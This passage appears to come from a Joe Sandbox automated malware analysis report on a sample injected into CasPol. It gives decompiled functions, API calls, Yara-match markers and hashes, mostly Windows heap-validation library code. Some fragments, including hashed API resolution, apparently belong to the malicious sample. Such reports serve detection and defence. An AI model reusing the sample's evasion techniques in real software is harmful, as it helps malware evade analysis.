                                                                        • API ID: FreeHeap
                                                                        • String ID:
                                                                        • API String ID: 3298025750-0
                                                                        • Opcode ID: 185113c4ed9c95c0ad52ebe8323c515ce5dfcfe1b1fe3ad59e1e53c3d55ff7ff
                                                                        • Instruction ID: a70d32c483ad18cc0f7891c95980f67120d115bce4dbab14678b91748736c37b
                                                                        • Opcode Fuzzy Hash: 185113c4ed9c95c0ad52ebe8323c515ce5dfcfe1b1fe3ad59e1e53c3d55ff7ff
                                                                        • Instruction Fuzzy Hash: 55F0A0756402006FCB18DF95DC45EEB3B7AEF89390F204459F90997282C230EC06CBB1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0041E84A Relevance: 1.5, APIs: 1, Instructions: 25memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • RtlFreeHeap.NTDLL(00000060,00000000,?,?,00000000,00000060,00000000,00000000,?,?,622BA63F,00000000,?), ref: 0041E8F0
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.353994530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_400000_CasPol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: FreeHeap
                                                                        • String ID:
                                                                        • API String ID: 3298025750-0
                                                                        • Opcode ID: a673fe6a02c8b6dc377b40048003395d9bc84ae260032fac4b060643fadd817f
                                                                        • Instruction ID: 03fdbb8d33d7dfe1cc8dd0dec87e9036be8be9c52387b500572499a6dd56ba50
                                                                        • Opcode Fuzzy Hash: a673fe6a02c8b6dc377b40048003395d9bc84ae260032fac4b060643fadd817f
                                                                        • Instruction Fuzzy Hash: E4E0D8F40152851FDB14FFAAA8908977BD9AF46204710499EEC944B606C121D5599B71
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00410053 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 16%
                                                                        			E00410053(intOrPtr _a4) {
				intOrPtr* _t7;
				void* _t8;

				asm("in al, dx");
				_t7 = E004195B3(_a4 + 0x20,  *((intOrPtr*)(_a4 + 0x9cc)), 0, 0, 0x998e91b2);
				if(_t7 != 0) {
					_t8 =  *_t7(0x10); // executed
					return 0 | _t8 == 0x000000f1;
				} else {
					return _t7;
				}
			}





                                                                        0x00410055
                                                                        0x0041006d
                                                                        0x00410077
                                                                        0x0041007d
                                                                        0x0041008c
                                                                        0x0041007a
                                                                        0x0041007a
                                                                        0x0041007a

                                                                        APIs
                                                                        • GetUserGeoID.KERNELBASE(00000010), ref: 0041007D
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.353994530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_400000_CasPol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: User
                                                                        • String ID:
                                                                        • API String ID: 765557111-0
                                                                        • Opcode ID: 8db12a4c292c9c454df692e40dc31025b76cec024ff7aae76387fcd38685c7b4
                                                                        • Instruction ID: 5be84a47f02960c0b1cba54ed20fb3a3f1d3a2dc5609808b463c0820bd0c15be
                                                                        • Opcode Fuzzy Hash: 8db12a4c292c9c454df692e40dc31025b76cec024ff7aae76387fcd38685c7b4
                                                                        • Instruction Fuzzy Hash: B2E0C27368030466FA2091A59C42FB6364F5B84B00F048475F90CE62C2D5A8E8C00018
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0041E8C3 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • RtlFreeHeap.NTDLL(00000060,00000000,?,?,00000000,00000060,00000000,00000000,?,?,622BA63F,00000000,?), ref: 0041E8F0
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.353994530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_400000_CasPol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: FreeHeap
                                                                        • String ID:
                                                                        • API String ID: 3298025750-0
                                                                        • Opcode ID: 23a076b226fe51778b5763cad65316f8bf1a978e6f8bf853b8ff448c05f6660e
                                                                        • Instruction ID: 5326cad36f1cd3682148bf768eca4d2391bf05bb07e48d38a5f889d0d41c1adc
                                                                        • Opcode Fuzzy Hash: 23a076b226fe51778b5763cad65316f8bf1a978e6f8bf853b8ff448c05f6660e
                                                                        • Instruction Fuzzy Hash: 54E012B5600208ABCB14EF89EC49EA737ACAF88754F018459BA095B282C630E914CAB1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0041E883 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E0041E883(intOrPtr _a4, void* _a8, long _a12, long _a16) {
				void* _t10;

				_t3 = _a4 + 0xa9c; // 0xa9c
				E0041F223( *((intOrPtr*)(_a4 + 0x14)), _t7, _t3,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x34);
				_t10 = RtlAllocateHeap(_a8, _a12, _a16); // executed
				return _t10;
			}




                                                                        0x0041e892
                                                                        0x0041e89a
                                                                        0x0041e8b0
                                                                        0x0041e8b4

                                                                        APIs
                                                                        • RtlAllocateHeap.NTDLL(00418C66,?,00419410,00419410,?,00418C66,00000000,?,?,?,?,00000000,00000000,00000002), ref: 0041E8B0
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.353994530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_400000_CasPol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AllocateHeap
                                                                        • String ID:
                                                                        • API String ID: 1279760036-0
                                                                        • Opcode ID: bededf418e3a0274c804535d3b84133155b4e078891fc5e6f2d2b0bfe9395de7
                                                                        • Instruction ID: f5ae067db63c9ddd1b8e3113497bae5bcd77b30f1fcc8f0db147245146a0e1c6
                                                                        • Opcode Fuzzy Hash: bededf418e3a0274c804535d3b84133155b4e078891fc5e6f2d2b0bfe9395de7
                                                                        • Instruction Fuzzy Hash: EBE046B6600208ABCB14EF89EC45EE737ACEF88764F018459FE085B242C630F914CAF1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0041EA23 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,?,0040FEA5,0040FEA5,?,00000000,?,?), ref: 0041EA53
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.353994530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_400000_CasPol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: LookupPrivilegeValue
                                                                        • String ID:
                                                                        • API String ID: 3899507212-0
                                                                        • Opcode ID: 3b3ebc9dfdd07f93e5458a11869c6f41762809d127f29865181a2f9f364af2cb
                                                                        • Instruction ID: 0b19f6a055a19a2633036f6401d78d8d10b6211b82747d2c4bdb0d8f64ca6bac
                                                                        • Opcode Fuzzy Hash: 3b3ebc9dfdd07f93e5458a11869c6f41762809d127f29865181a2f9f364af2cb
                                                                        • Instruction Fuzzy Hash: DFE01AB56002046BC710DF89DC45FE737ADAF88654F054469BA0857242D635E8148AF5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 013F967A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 592e5d08d2f69d875fe40c9ddc69937f9781905c7c44aafe45f7bb1ec9f345d1
                                                                        • Instruction ID: 1b956ea2bfd1902cfcb39b5461498132de3a27cb46f82300392e1bf8e43f5672
                                                                        • Opcode Fuzzy Hash: 592e5d08d2f69d875fe40c9ddc69937f9781905c7c44aafe45f7bb1ec9f345d1
                                                                        • Instruction Fuzzy Hash: 11B09B71D054C5C5D612D7E547087177A007BD0755F16C066E2020645B8778C095F6B5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Non-executed Functions

                                                                        Function 0146B260 Relevance: 37.8, Strings: 30, Instructions: 262COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        Strings
                                                                        • *** enter .exr %p for the exception record, xrefs: 0146B4F1
                                                                        • The resource is owned shared by %d threads, xrefs: 0146B37E
                                                                        • *** Resource timeout (%p) in %ws:%s, xrefs: 0146B352
                                                                        • The resource is owned exclusively by thread %p, xrefs: 0146B374
                                                                        • *** enter .cxr %p for the context, xrefs: 0146B50D
                                                                        • *** Inpage error in %ws:%s, xrefs: 0146B418
                                                                        • <unknown>, xrefs: 0146B27E, 0146B2D1, 0146B350, 0146B399, 0146B417, 0146B48E
                                                                        • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 0146B305
                                                                        • read from, xrefs: 0146B4AD, 0146B4B2
                                                                        • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 0146B484
                                                                        • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 0146B2DC
                                                                        • The instruction at %p referenced memory at %p., xrefs: 0146B432
                                                                        • Go determine why that thread has not released the critical section., xrefs: 0146B3C5
                                                                        • *** An Access Violation occurred in %ws:%s, xrefs: 0146B48F
                                                                        • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 0146B323
                                                                        • an invalid address, %p, xrefs: 0146B4CF
                                                                        • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 0146B39B
                                                                        • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 0146B53F
                                                                        • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 0146B476
                                                                        • write to, xrefs: 0146B4A6
                                                                        • The instruction at %p tried to %s , xrefs: 0146B4B6
                                                                        • *** then kb to get the faulting stack, xrefs: 0146B51C
                                                                        • The critical section is owned by thread %p., xrefs: 0146B3B9
                                                                        • This failed because of error %Ix., xrefs: 0146B446
                                                                        • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0146B38F
                                                                        • a NULL pointer, xrefs: 0146B4E0
                                                                        • *** A stack buffer overrun occurred in %ws:%s, xrefs: 0146B2F3
                                                                        • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0146B3D6
                                                                        • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 0146B314
                                                                        • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 0146B47D
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                                                        • API String ID: 0-108210295
                                                                        • Opcode ID: 1bd5e9b8391d82050b322fabd079ef9a447f81f6ed7af52a1cee29e199364632
                                                                        • Instruction ID: 51bd470bebbc589ffcad11dc56272ebb051cdb209d3c83dcbd9eb35a9f4de8d5
                                                                        • Opcode Fuzzy Hash: 1bd5e9b8391d82050b322fabd079ef9a447f81f6ed7af52a1cee29e199364632
                                                                        • Instruction Fuzzy Hash: 1F81E475B40210FFEB259A4ADC45D6B3B29EF66A5DF80406AF504AF332D2718452C6B3
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 01471C06 Relevance: 31.4, Strings: 25, Instructions: 195COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 44%
                                                                        			E01471C06() {
				signed int _t27;
				char* _t104;
				char* _t105;
				intOrPtr _t113;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t119;
				intOrPtr _t120;

				_t105 = 0x13948a4;
				_t104 = "HEAP: ";
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E013BB150();
				} else {
					E013BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push( *0x14a589c);
				E013BB150("Heap error detected at %p (heap handle %p)\n",  *0x14a58a0);
				_t27 =  *0x14a5898; // 0x0
				if(_t27 <= 0xf) {
					switch( *((intOrPtr*)(_t27 * 4 +  &M01471E96))) {
						case 0:
							_t105 = "heap_failure_internal";
							goto L21;
						case 1:
							goto L21;
						case 2:
							goto L21;
						case 3:
							goto L21;
						case 4:
							goto L21;
						case 5:
							goto L21;
						case 6:
							goto L21;
						case 7:
							goto L21;
						case 8:
							goto L21;
						case 9:
							goto L21;
						case 0xa:
							goto L21;
						case 0xb:
							goto L21;
						case 0xc:
							goto L21;
						case 0xd:
							goto L21;
						case 0xe:
							goto L21;
						case 0xf:
							goto L21;
					}
				}
				L21:
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E013BB150();
				} else {
					E013BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push(_t105);
				E013BB150("Error code: %d - %s\n",  *0x14a5898);
				_t113 =  *0x14a58a4; // 0x0
				if(_t113 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E013BB150();
					} else {
						E013BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E013BB150("Parameter1: %p\n",  *0x14a58a4);
				}
				_t115 =  *0x14a58a8; // 0x0
				if(_t115 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E013BB150();
					} else {
						E013BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E013BB150("Parameter2: %p\n",  *0x14a58a8);
				}
				_t117 =  *0x14a58ac; // 0x0
				if(_t117 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E013BB150();
					} else {
						E013BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E013BB150("Parameter3: %p\n",  *0x14a58ac);
				}
				_t119 =  *0x14a58b0; // 0x0
				if(_t119 != 0) {
					L41:
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E013BB150();
					} else {
						E013BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *0x14a58b4);
					E013BB150("Last known valid blocks: before - %p, after - %p\n",  *0x14a58b0);
				} else {
					_t120 =  *0x14a58b4; // 0x0
					if(_t120 != 0) {
						goto L41;
					}
				}
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E013BB150();
				} else {
					E013BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				return E013BB150("Stack trace available at %p\n", 0x14a58c0);
			}











                                                                        0x01471c10
                                                                        0x01471c16
                                                                        0x01471c1e
                                                                        0x01471c3d
                                                                        0x01471c3e
                                                                        0x01471c20
                                                                        0x01471c35
                                                                        0x01471c3a
                                                                        0x01471c44
                                                                        0x01471c55
                                                                        0x01471c5a
                                                                        0x01471c65
                                                                        0x01471c67
                                                                        0x00000000
                                                                        0x01471c6e
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x01471c67
                                                                        0x01471cdc
                                                                        0x01471ce5
                                                                        0x01471d04
                                                                        0x01471d05
                                                                        0x01471ce7
                                                                        0x01471cfc
                                                                        0x01471d01
                                                                        0x01471d0b
                                                                        0x01471d17
                                                                        0x01471d1f
                                                                        0x01471d25
                                                                        0x01471d30
                                                                        0x01471d4f
                                                                        0x01471d50
                                                                        0x01471d32
                                                                        0x01471d47
                                                                        0x01471d4c
                                                                        0x01471d61
                                                                        0x01471d67
                                                                        0x01471d68
                                                                        0x01471d6e
                                                                        0x01471d79
                                                                        0x01471d98
                                                                        0x01471d99
                                                                        0x01471d7b
                                                                        0x01471d90
                                                                        0x01471d95
                                                                        0x01471daa
                                                                        0x01471db0
                                                                        0x01471db1
                                                                        0x01471db7
                                                                        0x01471dc2
                                                                        0x01471de1
                                                                        0x01471de2
                                                                        0x01471dc4
                                                                        0x01471dd9
                                                                        0x01471dde
                                                                        0x01471df3
                                                                        0x01471df9
                                                                        0x01471dfa
                                                                        0x01471e00
                                                                        0x01471e0a
                                                                        0x01471e13
                                                                        0x01471e32
                                                                        0x01471e33
                                                                        0x01471e15
                                                                        0x01471e2a
                                                                        0x01471e2f
                                                                        0x01471e39
                                                                        0x01471e4a
                                                                        0x01471e02
                                                                        0x01471e02
                                                                        0x01471e08
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x01471e08
                                                                        0x01471e5b
                                                                        0x01471e7a
                                                                        0x01471e7b
                                                                        0x01471e5d
                                                                        0x01471e72
                                                                        0x01471e77
                                                                        0x01471e95

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                                                                        • API String ID: 0-2897834094
                                                                        • Opcode ID: 681bb61d6b7c58dc3daa83db7287e0053bb517e33225d291cf5aef6e66638921
                                                                        • Instruction ID: 115735cd9e3399b976099142915e3366c97ceea4115c7f4b89c762c7099e362c
                                                                        • Opcode Fuzzy Hash: 681bb61d6b7c58dc3daa83db7287e0053bb517e33225d291cf5aef6e66638921
                                                                        • Instruction Fuzzy Hash: 82610636521141DFD711AB89D4C5DB5B7A8EB04D38B8A803FF6096F731EA349C428F4A
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 01474AEF Relevance: 11.8, Strings: 9, Instructions: 529COMMONCrypto
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 59%
                                                                        			E01474AEF(void* __ecx, signed int __edx, intOrPtr* _a8, signed int* _a12, signed int* _a16, intOrPtr _a20, intOrPtr _a24) {
				signed int _v6;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t189;
				intOrPtr _t191;
				intOrPtr _t210;
				signed int _t225;
				signed char _t231;
				intOrPtr _t232;
				unsigned int _t245;
				intOrPtr _t249;
				intOrPtr _t259;
				signed int _t281;
				signed int _t283;
				intOrPtr _t284;
				signed int _t288;
				signed int* _t294;
				signed int* _t298;
				intOrPtr* _t299;
				intOrPtr* _t300;
				signed int _t307;
				signed int _t309;
				signed short _t312;
				signed short _t315;
				signed int _t317;
				signed int _t320;
				signed int _t322;
				signed int _t326;
				signed int _t327;
				void* _t328;
				signed int _t332;
				signed int _t340;
				signed int _t342;
				signed char _t344;
				signed int* _t345;
				void* _t346;
				signed char _t352;
				signed char _t367;
				signed int _t374;
				intOrPtr* _t378;
				signed int _t380;
				signed int _t385;
				signed char _t390;
				unsigned int _t392;
				signed char _t395;
				unsigned int _t397;
				intOrPtr* _t400;
				signed int _t402;
				signed int _t405;
				intOrPtr* _t406;
				signed int _t407;
				intOrPtr _t412;
				void* _t414;
				signed int _t415;
				signed int _t416;
				signed int _t429;

				_v16 = _v16 & 0x00000000;
				_t189 = 0;
				_v8 = _v8 & 0;
				_t332 = __edx;
				_v12 = 0;
				_t414 = __ecx;
				_t415 = __edx;
				if(__edx >=  *((intOrPtr*)(__edx + 0x28))) {
					L88:
					_t416 = _v16;
					if( *((intOrPtr*)(_t332 + 0x2c)) == _t416) {
						__eflags =  *((intOrPtr*)(_t332 + 0x30)) - _t189;
						if( *((intOrPtr*)(_t332 + 0x30)) == _t189) {
							L107:
							return 1;
						}
						_t191 =  *[fs:0x30];
						__eflags =  *(_t191 + 0xc);
						if( *(_t191 + 0xc) == 0) {
							_push("HEAP: ");
							E013BB150();
						} else {
							E013BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push(_v12);
						_push( *((intOrPtr*)(_t332 + 0x30)));
						_push(_t332);
						_push("Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)\n");
						L122:
						E013BB150();
						L119:
						return 0;
					}
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push("HEAP: ");
						E013BB150();
					} else {
						E013BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push(_t416);
					_push( *((intOrPtr*)(_t332 + 0x2c)));
					_push(_t332);
					_push("Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)\n");
					goto L122;
				} else {
					goto L1;
				}
				do {
					L1:
					 *_a16 = _t415;
					if( *(_t414 + 0x4c) != 0) {
						_t392 =  *(_t414 + 0x50) ^  *_t415;
						 *_t415 = _t392;
						_t352 = _t392 >> 0x00000010 ^ _t392 >> 0x00000008 ^ _t392;
						_t424 = _t392 >> 0x18 - _t352;
						if(_t392 >> 0x18 != _t352) {
							_push(_t352);
							E0146FA2B(_t332, _t414, _t415, _t414, _t415, _t424);
						}
					}
					if(_v8 != ( *(_t415 + 4) ^  *(_t414 + 0x54))) {
						_t210 =  *[fs:0x30];
						__eflags =  *(_t210 + 0xc);
						if( *(_t210 + 0xc) == 0) {
							_push("HEAP: ");
							E013BB150();
						} else {
							E013BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push(_v8 & 0x0000ffff);
						_t340 =  *(_t415 + 4) & 0x0000ffff ^  *(_t414 + 0x54) & 0x0000ffff;
						__eflags = _t340;
						_push(_t340);
						E013BB150("Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)\n", _t415);
						L117:
						__eflags =  *(_t414 + 0x4c);
						if( *(_t414 + 0x4c) != 0) {
							 *(_t415 + 3) =  *(_t415 + 2) ^  *(_t415 + 1) ^  *_t415;
							 *_t415 =  *_t415 ^  *(_t414 + 0x50);
							__eflags =  *_t415;
						}
						goto L119;
					}
					_t225 =  *_t415 & 0x0000ffff;
					_t390 =  *(_t415 + 2);
					_t342 = _t225;
					_v8 = _t342;
					_v20 = _t342;
					_v28 = _t225 << 3;
					if((_t390 & 0x00000001) == 0) {
						__eflags =  *(_t414 + 0x40) & 0x00000040;
						_t344 = (_t342 & 0xffffff00 | ( *(_t414 + 0x40) & 0x00000040) != 0x00000000) & _t390 >> 0x00000002;
						__eflags = _t344 & 0x00000001;
						if((_t344 & 0x00000001) == 0) {
							L66:
							_t345 = _a12;
							 *_a8 =  *_a8 + 1;
							 *_t345 =  *_t345 + ( *_t415 & 0x0000ffff);
							__eflags =  *_t345;
							L67:
							_t231 =  *(_t415 + 6);
							if(_t231 == 0) {
								_t346 = _t414;
							} else {
								_t346 = (_t415 & 0xffff0000) - ((_t231 & 0x000000ff) << 0x10) + 0x10000;
							}
							if(_t346 != _t332) {
								_t232 =  *[fs:0x30];
								__eflags =  *(_t232 + 0xc);
								if( *(_t232 + 0xc) == 0) {
									_push("HEAP: ");
									E013BB150();
								} else {
									E013BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push( *(_t415 + 6) & 0x000000ff);
								_push(_t415);
								_push("Heap block at %p has incorrect segment offset (%x)\n");
								goto L95;
							} else {
								if( *((char*)(_t415 + 7)) != 3) {
									__eflags =  *(_t414 + 0x4c);
									if( *(_t414 + 0x4c) != 0) {
										 *(_t415 + 3) =  *(_t415 + 1) ^  *_t415 ^  *(_t415 + 2);
										 *_t415 =  *_t415 ^  *(_t414 + 0x50);
										__eflags =  *_t415;
									}
									_t415 = _t415 + _v28;
									__eflags = _t415;
									goto L86;
								}
								_t245 =  *(_t415 + 0x1c);
								if(_t245 == 0) {
									_t395 =  *_t415 & 0x0000ffff;
									_v6 = _t395 >> 8;
									__eflags = _t415 + _t395 * 8 -  *((intOrPtr*)(_t332 + 0x28));
									if(_t415 + _t395 * 8 ==  *((intOrPtr*)(_t332 + 0x28))) {
										__eflags =  *(_t414 + 0x4c);
										if( *(_t414 + 0x4c) != 0) {
											 *(_t415 + 3) =  *(_t415 + 2) ^ _v6 ^ _t395;
											 *_t415 =  *_t415 ^  *(_t414 + 0x50);
											__eflags =  *_t415;
										}
										goto L107;
									}
									_t249 =  *[fs:0x30];
									__eflags =  *(_t249 + 0xc);
									if( *(_t249 + 0xc) == 0) {
										_push("HEAP: ");
										E013BB150();
									} else {
										E013BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
									}
									_push( *((intOrPtr*)(_t332 + 0x28)));
									_push(_t415);
									_push("Heap block at %p is not last block in segment (%p)\n");
									L95:
									E013BB150();
									goto L117;
								}
								_v12 = _v12 + 1;
								_v16 = _v16 + (_t245 >> 0xc);
								if( *(_t414 + 0x4c) != 0) {
									 *(_t415 + 3) =  *(_t415 + 1) ^  *_t415 ^  *(_t415 + 2);
									 *_t415 =  *_t415 ^  *(_t414 + 0x50);
								}
								_t415 = _t415 + 0x20 +  *(_t415 + 0x1c);
								if(_t415 ==  *((intOrPtr*)(_t332 + 0x28))) {
									L82:
									_v8 = _v8 & 0x00000000;
									goto L86;
								} else {
									if( *(_t414 + 0x4c) != 0) {
										_t397 =  *(_t414 + 0x50) ^  *_t415;
										 *_t415 = _t397;
										_t367 = _t397 >> 0x00000010 ^ _t397 >> 0x00000008 ^ _t397;
										_t442 = _t397 >> 0x18 - _t367;
										if(_t397 >> 0x18 != _t367) {
											_push(_t367);
											E0146FA2B(_t332, _t414, _t415, _t414, _t415, _t442);
										}
									}
									if( *(_t414 + 0x54) !=  *(_t415 + 4)) {
										_t259 =  *[fs:0x30];
